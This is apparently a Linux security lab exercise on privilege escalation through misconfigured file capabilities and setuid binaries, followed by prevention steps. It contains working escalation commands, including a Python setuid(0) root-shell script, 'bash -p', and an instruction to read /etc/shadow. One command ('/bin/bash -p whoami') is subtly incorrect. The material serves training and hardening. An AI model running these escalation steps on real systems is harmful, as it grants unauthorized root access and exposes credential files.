Exercise 14: Abusing the setcap and setuid Capabilities

Objective: Understand how to exploit Linux capabilities such as setcap and setuid to gain elevated privileges without needing full root access, and learn how to secure these capabilities to prevent abuse.

Scenario: Linux capabilities allow specific privileges to be granted to binaries, enabling them to perform certain actions without requiring full root access. However, misconfigured or unnecessary capabilities can be exploited to escalate privileges. Your task is to identify binaries with elevated capabilities, exploit them, and secure the system by limiting these capabilities.

Lab Setup

1. Environment:
   • A Linux system with capabilities enabled and at least one misconfigured binary.
2. Tools Required:
   • getcap
   • setcap
   • Basic scripting knowledge (optional).

Lab Steps

Step 1: Identify Capabilities on Binaries

List all binaries with capabilities using getcap:

getcap -r / 2>/dev/null

Example output:

/usr/bin/python3 = cap_setuid+ep 
/usr/bin/ping = cap_net_raw+ep

cap_setuid+ep: Grants the binary the ability to change its user ID.

cap_net_raw+ep: Allows raw socket operations.

Analyze each binary for potential misuse.

Step 2: Exploit Misconfigured Capabilities

Exploiting cap_setuid:

If a binary like /usr/bin/python3 has the cap_setuid capability, create a Python script to escalate privileges:

import os 
os.setuid(0) 
os.system("/bin/bash")

Save the script as exploit.py and execute it:

python3 exploit.py

Verify root access:

whoami

Exploiting cap_net_bind_service:

If a binary has the capability to bind to low-numbered ports (e.g., cap_net_bind_service), use it to run a service on a privileged port (e.g., port 80):

/path/to/binary -p 80

Exploiting setuid Permissions:

Locate binaries with the setuid bit set:

find / -perm -4000 2>/dev/null

Example output:

/bin/bash

Use the binary to escalate privileges:

/bin/bash -p whoami

Step 3: Gain Unauthorized Access

1. Exploit the identified binaries to perform unauthorized actions, such as:
   • Reading sensitive files (e.g., /etc/shadow).
   • Modifying system settings.

Solution

Explanation:

• Linux capabilities and setuid permissions enable binaries to perform privileged actions. Misconfigured capabilities or unnecessary setuid bits can allow attackers to escalate privileges or bypass security restrictions.

Prevention:

Audit Capabilities:

Regularly list and review file capabilities:

getcap -r / 2>/dev/null

Remove unnecessary capabilities:

sudo setcap -r /path/to/binary

Restrict setuid Binaries:

Identify and limit setuid binaries:

find / -perm -4000 2>/dev/null

Remove the setuid bit if not required:

chmod u-s /path/to/binary

Use Principle of Least Privilege:

Assign only the capabilities necessary for the binary’s function.

Avoid using generic capabilities like cap_setuid unless absolutely required.

Monitor and Log Usage:

Use tools like auditd to track the usage of capabilities and setuid binaries.

Testing and Verification

1. Re-run getcap and find commands to verify that unnecessary capabilities and setuid bits are removed.
2. Attempt to exploit the previously vulnerable binaries to confirm that mitigations are effective.
3. Document all changes and ensure compliance with security policies.

Reflection

This exercise demonstrates the risks of misconfigured capabilities and setuid permissions, and how they can be exploited for privilege escalation. By identifying, exploiting, and securing these features, you’ve gained valuable insights into securing Linux systems against such vulnerabilities.